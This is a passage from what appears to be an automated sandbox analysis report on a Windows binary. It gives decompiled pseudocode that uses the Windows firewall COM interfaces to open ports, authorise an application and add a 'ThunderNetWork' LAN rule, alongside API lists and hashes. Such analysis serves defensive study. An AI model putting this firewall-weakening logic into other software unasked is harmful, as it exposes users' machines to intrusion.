                                                                                                                                                      							_t110 = _t85;
                                                                                                                                                      							if(_t85 >= 0) {
                                                                                                                                                      								_t87 = E009980F0( &_v40, "HNetCfg.FwOpenPort");
                                                                                                                                                      								__imp__CLSIDFromProgID(_t87,  &_v24);
                                                                                                                                                      								_t110 = _t87;
                                                                                                                                                      								if(_t87 >= 0) {
                                                                                                                                                      									_t90 =  *_t129( &_v24, 0, 5, 0x99c17c,  &_v28);
                                                                                                                                                      									_t110 = _t90;
                                                                                                                                                      									if(_t90 >= 0) {
                                                                                                                                                      										_t129 = _v60;
                                                                                                                                                      										_v52 = 0;
                                                                                                                                                      										_v48 = 0x100;
                                                                                                                                                      										if(E00991071(_v60,  &_v48,  &_v52) != 0) {
                                                                                                                                                      											_t93 = _v28;
                                                                                                                                                      											 *((intOrPtr*)( *_t93 + 0x38))(_t93, _v52);
                                                                                                                                                      											_t95 = _v28;
                                                                                                                                                      											 *((intOrPtr*)( *_t95 + 0x30))(_t95, _v48);
                                                                                                                                                      											 *((intOrPtr*)( *_v28 + 0x20))(_v28, E009980F0( &_v40, _v56));
                                                                                                                                                      											_t100 = _v28;
                                                                                                                                                      											 *((intOrPtr*)( *_t100 + 0x40))(_t100, 0);
                                                                                                                                                      											_t102 = _v28;
                                                                                                                                                      											 *((intOrPtr*)( *_t102 + 0x28))(_t102, 2);
                                                                                                                                                      											_t104 = _v28;
                                                                                                                                                      											 *((intOrPtr*)( *_t104 + 0x50))(_t104, 1);
                                                                                                                                                      											_t106 = _v40;
                                                                                                                                                      											_t128 =  &_v36;
                                                                                                                                                      											_t107 =  *((intOrPtr*)( *_t106 + 0x48))(_t106,  &_v36);
                                                                                                                                                      											_t110 = _t107;
                                                                                                                                                      											if(_t107 >= 0) {
                                                                                                                                                      												_t108 = _v36;
                                                                                                                                                      												_t110 =  *((intOrPtr*)( *_t108 + 0x20))(_t108, _v28);
                                                                                                                                                      											}
                                                                                                                                                      										}
                                                                                                                                                      										_t130 = 0;
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				_t67 = _v28;
                                                                                                                                                      				if(_t67 != _t130) {
                                                                                                                                                      					 *((intOrPtr*)( *_t67 + 8))(_t67);
                                                                                                                                                      				}
                                                                                                                                                      				_t68 = _v36;
                                                                                                                                                      				if(_t68 != _t130) {
                                                                                                                                                      					 *((intOrPtr*)( *_t68 + 8))(_t68);
                                                                                                                                                      				}
                                                                                                                                                      				_t69 = _v40;
                                                                                                                                                      				if(_t69 != _t130) {
                                                                                                                                                      					 *((intOrPtr*)( *_t69 + 8))(_t69);
                                                                                                                                                      				}
                                                                                                                                                      				_t70 = _v44;
                                                                                                                                                      				if(_t70 != _t130) {
                                                                                                                                                      					 *((intOrPtr*)( *_t70 + 8))(_t70);
                                                                                                                                                      				}
                                                                                                                                                      				_t71 = _v32;
                                                                                                                                                      				if(_t71 != _t130) {
                                                                                                                                                      					 *((intOrPtr*)( *_t71 + 8))(_t71);
                                                                                                                                                      				}
                                                                                                                                                      				__imp__CoUninitialize();
                                                                                                                                                      				return E00991C57(_t110, _t110, _v8 ^ _t133, _t128, _t129, _t130);
                                                                                                                                                      			}










































                                                                                                                                                      APIs
                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 0099197E
                                                                                                                                                      • _com_util::ConvertStringToBSTR.COMSUPP ref: 0099199C
                                                                                                                                                      • CLSIDFromProgID.OLE32(00000000,HNetCfg.FwMgr,?), ref: 009919A2
                                                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,0099C17C,?), ref: 009919C8
                                                                                                                                                      • _com_util::ConvertStringToBSTR.COMSUPP ref: 00991A0B
                                                                                                                                                        • Part of subcall function 009980F0: lstrlenA.KERNEL32(?,315D8C09,?,80004005,?,000000FE,?,00991112,00000000), ref: 00998137
                                                                                                                                                        • Part of subcall function 009980F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,80004005,?,000000FE,?,00991112,00000000), ref: 0099814D
                                                                                                                                                        • Part of subcall function 009980F0: GetLastError.KERNEL32(?,80004005,?,000000FE,?,00991112,00000000), ref: 0099815C
                                                                                                                                                        • Part of subcall function 009980F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,000000FE,?,00991112,00000000), ref: 009981EB
                                                                                                                                                        • Part of subcall function 009980F0: GetLastError.KERNEL32(?,000000FE,?,00991112,00000000), ref: 00998206
                                                                                                                                                        • Part of subcall function 009980F0: SysAllocString.OLEAUT32(00000000), ref: 00998221
                                                                                                                                                      • CLSIDFromProgID.OLE32(00000000,HNetCfg.FwOpenPort,?), ref: 00991A11
                                                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,0099C17C,?), ref: 00991A31
                                                                                                                                                        • Part of subcall function 00991071: __wcstoui64.LIBCMT ref: 009910DB
                                                                                                                                                      • _com_util::ConvertStringToBSTR.COMSUPP ref: 00991A7B
                                                                                                                                                        • Part of subcall function 009980F0: _malloc.LIBCMT ref: 009981A1
                                                                                                                                                      • CoUninitialize.OLE32 ref: 00991B0C
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.398091736.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                      • Associated: 00000012.00000002.398080396.0000000000990000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398104871.000000000099C000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398137583.000000000099F000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398145055.00000000009A1000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: String$Convert_com_util::$ByteCharCreateErrorFromInstanceLastMultiProgWide$AllocInitializeUninitialize__wcstoui64_malloclstrlen
                                                                                                                                                      • String ID: HNetCfg.FwMgr$HNetCfg.FwOpenPort
                                                                                                                                                      • API String ID: 3570467124-3777566516
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 92%
                                                                                                                                                      			E0099323D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                      				struct HINSTANCE__* _t23;
                                                                                                                                                      				intOrPtr _t28;
                                                                                                                                                      				intOrPtr _t32;
                                                                                                                                                      				intOrPtr _t46;
                                                                                                                                                      				void* _t47;
                                                                                                                                                      
                                                                                                                                                      				_t35 = __ebx;
                                                                                                                                                      				_push(0xc);
                                                                                                                                                      				_push(0x99dd18);
                                                                                                                                                      				E00993F70(__ebx, __edi, __esi);
                                                                                                                                                      				_t45 = L"KERNEL32.DLL";
                                                                                                                                                      				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
                                                                                                                                                      				if(_t23 == 0) {
                                                                                                                                                      					_t23 = E00992003(_t45);
                                                                                                                                                      				}
                                                                                                                                                      				 *(_t47 - 0x1c) = _t23;
                                                                                                                                                      				_t46 =  *((intOrPtr*)(_t47 + 8));
                                                                                                                                                      				 *((intOrPtr*)(_t46 + 0x5c)) = 0x99c870;
                                                                                                                                                      				 *((intOrPtr*)(_t46 + 0x14)) = 1;
                                                                                                                                                      				if(_t23 != 0) {
                                                                                                                                                      					_t35 = GetProcAddress;
                                                                                                                                                      					 *((intOrPtr*)(_t46 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
                                                                                                                                                      					 *((intOrPtr*)(_t46 + 0x1fc)) = GetProcAddress( *(_t47 - 0x1c), "DecodePointer");
                                                                                                                                                      				}
                                                                                                                                                      				 *((intOrPtr*)(_t46 + 0x70)) = 1;
                                                                                                                                                      				 *((char*)(_t46 + 0xc8)) = 0x43;
                                                                                                                                                      				 *((char*)(_t46 + 0x14b)) = 0x43;
                                                                                                                                                      				 *(_t46 + 0x68) = 0x99f010;
                                                                                                                                                      				E00993C3D(_t35, 0xd);
                                                                                                                                                      				 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
                                                                                                                                                      				InterlockedIncrement( *(_t46 + 0x68));
                                                                                                                                                      				 *(_t47 - 4) = 0xfffffffe;
                                                                                                                                                      				E00993312();
                                                                                                                                                      				E00993C3D(_t35, 0xc);
                                                                                                                                                      				 *(_t47 - 4) = 1;
                                                                                                                                                      				_t28 =  *((intOrPtr*)(_t47 + 0xc));
                                                                                                                                                      				 *((intOrPtr*)(_t46 + 0x6c)) = _t28;
                                                                                                                                                      				if(_t28 == 0) {
                                                                                                                                                      					_t32 =  *0x99f618; // 0x99f540
                                                                                                                                                      					 *((intOrPtr*)(_t46 + 0x6c)) = _t32;
                                                                                                                                                      				}
                                                                                                                                                      				E00992EFA( *((intOrPtr*)(_t46 + 0x6c)));
                                                                                                                                                      				 *(_t47 - 4) = 0xfffffffe;
                                                                                                                                                      				return E00993FB5(E0099331B());
                                                                                                                                                      			}









                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0099DD18,0000000C,00993378,00000000,00000000,?,00000000,?,009990BC,00000000,00010000,00030000,?,009984B4), ref: 0099324F
                                                                                                                                                      • __crt_waiting_on_module_handle.LIBCMT ref: 0099325A
                                                                                                                                                        • Part of subcall function 00992003: Sleep.KERNEL32(000003E8,00000000,?,009931A0,KERNEL32.DLL,?,009931EC,?,00000000,?,009990BC,00000000,00010000,00030000,?,009984B4), ref: 0099200F
                                                                                                                                                        • Part of subcall function 00992003: GetModuleHandleW.KERNEL32(00000000,?,009931A0,KERNEL32.DLL,?,009931EC,?,00000000,?,009990BC,00000000,00010000,00030000,?,009984B4), ref: 00992018
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00993283
                                                                                                                                                      • GetProcAddress.KERNEL32(?,DecodePointer), ref: 00993293
                                                                                                                                                      • __lock.LIBCMT ref: 009932B5
                                                                                                                                                      • InterlockedIncrement.KERNEL32(?), ref: 009932C2
                                                                                                                                                      • __lock.LIBCMT ref: 009932D6
                                                                                                                                                      • ___addlocaleref.LIBCMT ref: 009932F4
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.398091736.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                      • Associated: 00000012.00000002.398080396.0000000000990000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398104871.000000000099C000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398137583.000000000099F000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398145055.00000000009A1000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                                                                                      • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                                                      • API String ID: 1028249917-2843748187
                                                                                                                                                      • Opcode ID: 77637e0f1594a0681a08654bf475df8728e4b0566cf27fe7608583672c2c16d4
                                                                                                                                                      • Instruction ID: 48f2574e6663b4527eb5da6d47896da4c410a3a33100591b2aa49731aa94d149
                                                                                                                                                      • Opcode Fuzzy Hash: 77637e0f1594a0681a08654bf475df8728e4b0566cf27fe7608583672c2c16d4
                                                                                                                                                      • Instruction Fuzzy Hash: D31190B1904701EADF20AF7DDC06B5EBBE4AF44314F10851AE4A9A22A1CB74AA40DF54
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 81%
                                                                                                                                                      			E00991191(void* __eax, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                      				void* _v8;
                                                                                                                                                      				signed int _v12;
                                                                                                                                                      				void* _v16;
                                                                                                                                                      				void* _v20;
                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                      				char _v28;
                                                                                                                                                      				char _v32;
                                                                                                                                                      				intOrPtr _v36;
                                                                                                                                                      				intOrPtr _v40;
                                                                                                                                                      				signed int _v44;
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				intOrPtr _t67;
                                                                                                                                                      				intOrPtr* _t71;
                                                                                                                                                      				intOrPtr* _t72;
                                                                                                                                                      				intOrPtr* _t73;
                                                                                                                                                      				intOrPtr _t80;
                                                                                                                                                      				intOrPtr* _t83;
                                                                                                                                                      				intOrPtr* _t85;
                                                                                                                                                      				char* _t87;
                                                                                                                                                      				intOrPtr* _t88;
                                                                                                                                                      				intOrPtr* _t90;
                                                                                                                                                      				intOrPtr* _t92;
                                                                                                                                                      				intOrPtr* _t94;
                                                                                                                                                      				intOrPtr* _t96;
                                                                                                                                                      				intOrPtr* _t98;
                                                                                                                                                      				intOrPtr* _t100;
                                                                                                                                                      				intOrPtr* _t102;
                                                                                                                                                      				intOrPtr* _t104;
                                                                                                                                                      				intOrPtr* _t106;
                                                                                                                                                      				intOrPtr* _t108;
                                                                                                                                                      				char* _t110;
                                                                                                                                                      				void* _t134;
                                                                                                                                                      				intOrPtr _t135;
                                                                                                                                                      				intOrPtr _t138;
                                                                                                                                                      
                                                                                                                                                      				_t131 = __edx;
                                                                                                                                                      				_t134 = __eax;
                                                                                                                                                      				_v44 = 0;
                                                                                                                                                      				_t110 = 0x80004005;
                                                                                                                                                      				_v20 = 0;
                                                                                                                                                      				_v16 = 0;
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				_v12 = 0;
                                                                                                                                                      				_v24 = E009980F0(__edx, _a4);
                                                                                                                                                      				_t67 = E009980F0(__edx, "ThunderNetWork");
                                                                                                                                                      				_v36 = _t67;
                                                                                                                                                      				_v28 = 0x100;
                                                                                                                                                      				__imp__#2(L"LAN");
                                                                                                                                                      				_v40 = _t67;
                                                                                                                                                      				E009980F0(__edx, _a8);
                                                                                                                                                      				_v32 = 0;
                                                                                                                                                      				if(E00991071(_t134,  &_v28,  &_v32) == 0) {
                                                                                                                                                      					_t135 = _v44;
                                                                                                                                                      				} else {
                                                                                                                                                      					_t80 = E009980F0(_t131, E00991C70(_t134, ":") + 1);
                                                                                                                                                      					_t138 = _t80;
                                                                                                                                                      					__imp__CoInitializeEx(0, 2);
                                                                                                                                                      					_t135 = _t80;
                                                                                                                                                      					if(_t135 == 0x80010106 || _t135 >= 0) {
                                                                                                                                                      						_t110 = E00991058( &_v20,  &_v20);
                                                                                                                                                      						if(_t110 >= 0) {
                                                                                                                                                      							_t83 = _v20;
                                                                                                                                                      							_t110 =  *((intOrPtr*)( *_t83 + 0x48))(_t83,  &_v16);
                                                                                                                                                      							if(_t110 >= 0) {
                                                                                                                                                      								_t85 = _v20;
                                                                                                                                                      								_t110 =  *((intOrPtr*)( *_t85 + 0x1c))(_t85,  &_v12);
                                                                                                                                                      								if(_t110 >= 0) {
                                                                                                                                                      									if((_v12 & 0x00000004) != 0 && _v12 != 4) {
                                                                                                                                                      										_v12 = _v12 ^ 0x00000004;
                                                                                                                                                      									}
                                                                                                                                                      									_t87 =  &_v8;
                                                                                                                                                      									__imp__CoCreateInstance(0x99db2c, 0, 1, 0x99db3c, _t87);
                                                                                                                                                      									_t110 = _t87;
                                                                                                                                                      									if(_t110 >= 0) {
                                                                                                                                                      										_t88 = _v16;
                                                                                                                                                      										 *((intOrPtr*)( *_t88 + 0x24))(_t88, _v24);
                                                                                                                                                      										_t90 = _v8;
                                                                                                                                                      										 *((intOrPtr*)( *_t90 + 0x20))(_t90, _v24);
                                                                                                                                                      										_t92 = _v8;
                                                                                                                                                      										 *((intOrPtr*)( *_t92 + 0x28))(_t92, _v36);
                                                                                                                                                      										_t94 = _v8;
                                                                                                                                                      										 *((intOrPtr*)( *_t94 + 0x40))(_t94, _v28);
                                                                                                                                                      										_t96 = _v8;
                                                                                                                                                      										 *((intOrPtr*)( *_t96 + 0x98))(_t96, _v12);
                                                                                                                                                      										_t98 = _v8;
                                                                                                                                                      										 *((intOrPtr*)( *_t98 + 0xa8))(_t98, 1);
                                                                                                                                                      										_t100 = _v8;
                                                                                                                                                      										 *((intOrPtr*)( *_t100 + 0x88))(_t100, 0xffffffff);
                                                                                                                                                      										_t102 = _v8;
                                                                                                                                                      										 *((intOrPtr*)( *_t102 + 0x80))(_t102, _v40);
                                                                                                                                                      										_t104 = _v8;
                                                                                                                                                      										 *((intOrPtr*)( *_t104 + 0x48))(_t104, _t138);
                                                                                                                                                      										_t106 = _v8;
                                                                                                                                                      										 *((intOrPtr*)( *_t106 + 0x98))(_t106, 6);
                                                                                                                                                      										_t108 = _v16;
                                                                                                                                                      										_t110 =  *((intOrPtr*)( *_t108 + 0x20))(_t108, _v8);
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				_t71 = _v8;
                                                                                                                                                      				if(_t71 != 0) {
                                                                                                                                                      					 *((intOrPtr*)( *_t71 + 8))(_t71);
                                                                                                                                                      				}
                                                                                                                                                      				_t72 = _v16;
                                                                                                                                                      				if(_t72 != 0) {
                                                                                                                                                      					 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                                                                                                                      				}
                                                                                                                                                      				_t73 = _v20;
                                                                                                                                                      				if(_t73 != 0) {
                                                                                                                                                      					 *((intOrPtr*)( *_t73 + 8))(_t73);
                                                                                                                                                      				}
                                                                                                                                                      				if(_t135 >= 0) {
                                                                                                                                                      					__imp__CoUninitialize();
                                                                                                                                                      				}
                                                                                                                                                      				return _t110;
                                                                                                                                                      			}


                                                                                                                                                      APIs
                                                                                                                                                      • _com_util::ConvertStringToBSTR.COMSUPP ref: 009911B5
                                                                                                                                                      • _com_util::ConvertStringToBSTR.COMSUPP ref: 009911C2
                                                                                                                                                        • Part of subcall function 009980F0: lstrlenA.KERNEL32(?,315D8C09,?,80004005,?,000000FE,?,00991112,00000000), ref: 00998137
                                                                                                                                                        • Part of subcall function 009980F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,80004005,?,000000FE,?,00991112,00000000), ref: 0099814D
                                                                                                                                                        • Part of subcall function 009980F0: GetLastError.KERNEL32(?,80004005,?,000000FE,?,00991112,00000000), ref: 0099815C
                                                                                                                                                        • Part of subcall function 009980F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,000000FE,?,00991112,00000000), ref: 009981EB
                                                                                                                                                        • Part of subcall function 009980F0: GetLastError.KERNEL32(?,000000FE,?,00991112,00000000), ref: 00998206
                                                                                                                                                        • Part of subcall function 009980F0: SysAllocString.OLEAUT32(00000000), ref: 00998221
                                                                                                                                                      • SysAllocString.OLEAUT32(LAN), ref: 009911D6
                                                                                                                                                      • _com_util::ConvertStringToBSTR.COMSUPP ref: 009911E2
                                                                                                                                                        • Part of subcall function 009980F0: _malloc.LIBCMT ref: 009981A1
                                                                                                                                                        • Part of subcall function 00991071: __wcstoui64.LIBCMT ref: 009910DB
                                                                                                                                                      • _com_util::ConvertStringToBSTR.COMSUPP ref: 0099120E
                                                                                                                                                      • CoInitializeEx.OLE32(00000000,00000002,00000001,?), ref: 00991219
                                                                                                                                                      • CoCreateInstance.OLE32(0099DB2C,00000000,00000001,0099DB3C,?), ref: 00991295
                                                                                                                                                      • CoUninitialize.OLE32(?), ref: 00991365
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.398091736.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                      • Associated: 00000012.00000002.398080396.0000000000990000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398104871.000000000099C000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398137583.000000000099F000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398145055.00000000009A1000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: String$Convert_com_util::$AllocByteCharErrorLastMultiWide$CreateInitializeInstanceUninitialize__wcstoui64_malloclstrlen
                                                                                                                                                      • String ID: LAN$ThunderNetWork
                                                                                                                                                      • API String ID: 1199507461-1899760959
                                                                                                                                                      • Opcode ID: 89262e65c9338fcddf6d6331128d98bf15cf0dce747a5ebff1c43a8c032939b9
                                                                                                                                                      • Instruction ID: 781d49529a3e12c0cfbf7debf4d32bd3ea0d432734b6d1d3ee9973d0d9674461
                                                                                                                                                      • Opcode Fuzzy Hash: 89262e65c9338fcddf6d6331128d98bf15cf0dce747a5ebff1c43a8c032939b9
                                                                                                                                                      • Instruction Fuzzy Hash: 02610F75A00206EFCF00DFE8C889A9E7BB9FF89714F104499F905EB251DB759942CB60
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 53%
                                                                                                                                                      			E00991567(char* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                      				signed int _v12;
                                                                                                                                                      				char _v28;
                                                                                                                                                      				void* _v32;
                                                                                                                                                      				void* _v36;
                                                                                                                                                      				void* _v40;
                                                                                                                                                      				void* _v44;
                                                                                                                                                      				intOrPtr _v48;
                                                                                                                                                      				void* __ebx;
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				signed int _t34;
                                                                                                                                                      				void* _t38;
                                                                                                                                                      				char* _t39;
                                                                                                                                                      				intOrPtr* _t40;
                                                                                                                                                      				intOrPtr* _t41;
                                                                                                                                                      				intOrPtr* _t42;
                                                                                                                                                      				intOrPtr* _t43;
                                                                                                                                                      				char* _t51;
                                                                                                                                                      				intOrPtr* _t52;
                                                                                                                                                      				char* _t53;
                                                                                                                                                      				intOrPtr* _t54;
                                                                                                                                                      				char* _t55;
                                                                                                                                                      				char* _t58;
                                                                                                                                                      				intOrPtr* _t59;
                                                                                                                                                      				char* _t60;
                                                                                                                                                      				intOrPtr* _t75;
                                                                                                                                                      				signed int _t78;
                                                                                                                                                      
                                                                                                                                                      				_t74 = __edx;
                                                                                                                                                      				_t34 =  *0x99f008; // 0x315d8c09
                                                                                                                                                      				_v12 = _t34 ^ _t78;
                                                                                                                                                      				_v48 = _a4;
                                                                                                                                                      				__imp__CoInitialize(0);
                                                                                                                                                      				_v44 = 0;
                                                                                                                                                      				_v36 = 0;
                                                                                                                                                      				_v40 = 0;
                                                                                                                                                      				_v32 = 0;
                                                                                                                                                      				_t38 = E009980F0(__edx, "HNetCfg.FwMgr");
                                                                                                                                                      				_t75 = __imp__CLSIDFromProgID;
                                                                                                                                                      				_t39 =  *_t75(_t38,  &_v28);
                                                                                                                                                      				_t76 = _t39;
                                                                                                                                                      				if(_t39 == 0) {
                                                                                                                                                      					_t51 =  &_v28;
                                                                                                                                                      					__imp__CoCreateInstance(_t51, 0, 5, 0x99c17c,  &_v44);
                                                                                                                                                      					_t76 = _t51;
                                                                                                                                                      					if(_t51 >= 0) {
                                                                                                                                                      						_t52 = _v44;
                                                                                                                                                      						_t74 =  &_v36;
                                                                                                                                                      						_t53 =  *((intOrPtr*)( *_t52 + 0x1c))(_t52,  &_v36);
                                                                                                                                                      						_t76 = _t53;
                                                                                                                                                      						if(_t53 >= 0) {
                                                                                                                                                      							_t54 = _v36;
                                                                                                                                                      							_t74 =  &_v40;
                                                                                                                                                      							_t55 =  *((intOrPtr*)( *_t54 + 0x1c))(_t54,  &_v40);
                                                                                                                                                      							_t76 = _t55;
                                                                                                                                                      							if(_t55 >= 0) {
                                                                                                                                                      								_t58 =  *_t75(E009980F0( &_v40, "HNetCfg.FwAuthorizedApplication"),  &_v28);
                                                                                                                                                      								_t76 = _t58;
                                                                                                                                                      								if(_t58 >= 0) {
                                                                                                                                                      									_t59 = _v40;
                                                                                                                                                      									_t74 =  &_v32;
                                                                                                                                                      									_t60 =  *((intOrPtr*)( *_t59 + 0x50))(_t59,  &_v32);
                                                                                                                                                      									_t76 = _t60;
                                                                                                                                                      									if(_t60 >= 0) {
                                                                                                                                                      										_t76 =  *((intOrPtr*)( *_v32 + 0x24))(_v32, E009980F0( &_v32, _v48));
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				_t40 = _v32;
                                                                                                                                                      				if(_t40 != 0) {
                                                                                                                                                      					 *((intOrPtr*)( *_t40 + 8))(_t40);
                                                                                                                                                      				}
                                                                                                                                                      				_t41 = _v40;
                                                                                                                                                      				if(_t41 != 0) {
                                                                                                                                                      					 *((intOrPtr*)( *_t41 + 8))(_t41);
                                                                                                                                                      				}
                                                                                                                                                      				_t42 = _v36;
                                                                                                                                                      				if(_t42 != 0) {
                                                                                                                                                      					 *((intOrPtr*)( *_t42 + 8))(_t42);
                                                                                                                                                      				}
                                                                                                                                                      				_t43 = _v44;
                                                                                                                                                      				if(_t43 != 0) {
                                                                                                                                                      					 *((intOrPtr*)( *_t43 + 8))(_t43);
                                                                                                                                                      				}
                                                                                                                                                      				__imp__CoUninitialize();
                                                                                                                                                      				return E00991C57(_t76, 0, _v12 ^ _t78, _t74, _t75, _t76);
                                                                                                                                                      			}































                                                                                                                                                      APIs
                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 00991583
                                                                                                                                                      • _com_util::ConvertStringToBSTR.COMSUPP ref: 0099159E
                                                                                                                                                      • CLSIDFromProgID.OLE32(00000000,HNetCfg.FwMgr,?), ref: 009915AA
                                                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,0099C17C,?), ref: 009915C6
                                                                                                                                                      • _com_util::ConvertStringToBSTR.COMSUPP ref: 00991601
                                                                                                                                                        • Part of subcall function 009980F0: lstrlenA.KERNEL32(?,315D8C09,?,80004005,?,000000FE,?,00991112,00000000), ref: 00998137
                                                                                                                                                        • Part of subcall function 009980F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,80004005,?,000000FE,?,00991112,00000000), ref: 0099814D
                                                                                                                                                        • Part of subcall function 009980F0: GetLastError.KERNEL32(?,80004005,?,000000FE,?,00991112,00000000), ref: 0099815C
                                                                                                                                                        • Part of subcall function 009980F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,000000FE,?,00991112,00000000), ref: 009981EB
                                                                                                                                                        • Part of subcall function 009980F0: GetLastError.KERNEL32(?,000000FE,?,00991112,00000000), ref: 00998206
                                                                                                                                                        • Part of subcall function 009980F0: SysAllocString.OLEAUT32(00000000), ref: 00998221
                                                                                                                                                      • CLSIDFromProgID.OLE32(00000000,HNetCfg.FwAuthorizedApplication,?), ref: 00991607
                                                                                                                                                      • _com_util::ConvertStringToBSTR.COMSUPP ref: 0099162A
                                                                                                                                                        • Part of subcall function 009980F0: _malloc.LIBCMT ref: 009981A1
                                                                                                                                                      • CoUninitialize.OLE32 ref: 0099166C
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.398091736.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                      • Associated: 00000012.00000002.398080396.0000000000990000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398104871.000000000099C000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398137583.000000000099F000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000012.00000002.398145055.00000000009A1000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: String$Convert_com_util::$ByteCharErrorFromLastMultiProgWide$AllocCreateInitializeInstanceUninitialize_malloclstrlen
                                                                                                                                                      • String ID: HNetCfg.FwAuthorizedApplication$HNetCfg.FwMgr
                                                                                                                                                      • API String ID: 4188526640-1951265404
                                                                                                                                                      • Opcode ID: 503f9830d501c1a072032a7da8e2372e9aa0712e5ed63d06f12a4027018e4f49
                                                                                                                                                      • Instruction ID: 67fb1631cf7202bf7633ebf8fd13049f2bc8b49d219ce5ab546055eff32453ae
                                                                                                                                                      • Opcode Fuzzy Hash: 503f9830d501c1a072032a7da8e2372e9aa0712e5ed63d06f12a4027018e4f49
                                                                                                                                                      • Instruction Fuzzy Hash: BA410CB1D0021A9FCF10EFA8C8889EEB7BDBF89314B584569E901F7251DB359C46CB64
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 54%
                                                                                                                                                      			E00991683(char* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                      				signed int _v12;
                                                                                                                                                      				char _v28;
                                                                                                                                                      				void* _v32;
                                                                                                                                                      				void* _v36;
                                                                                                                                                      				void* _v40;
                                                                                                                                                      				void* _v44;
                                                                                                                                                      				char _v48;
                                                                                                                                                      				char _v52;
                                                                                                                                                      				intOrPtr _v56;
                                                                                                                                                      				void* __ebx;
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				signed int _t39;
                                                                                                                                                      				void* _t43;
                                                                                                                                                      				char* _t44;
                                                                                                                                                      				intOrPtr* _t45;
                                                                                                                                                      				intOrPtr* _t46;
                                                                                                                                                      				intOrPtr* _t47;
                                                                                                                                                      				intOrPtr* _t48;
                                                                                                                                                      				char* _t56;
                                                                                                                                                      				intOrPtr* _t57;
                                                                                                                                                      				char* _t58;
                                                                                                                                                      				intOrPtr* _t59;
                                                                                                                                                      				char* _t60;
                                                                                                                                                      				char* _t63;
                                                                                                                                                      				intOrPtr* _t64;
                                                                                                                                                      				char* _t65;
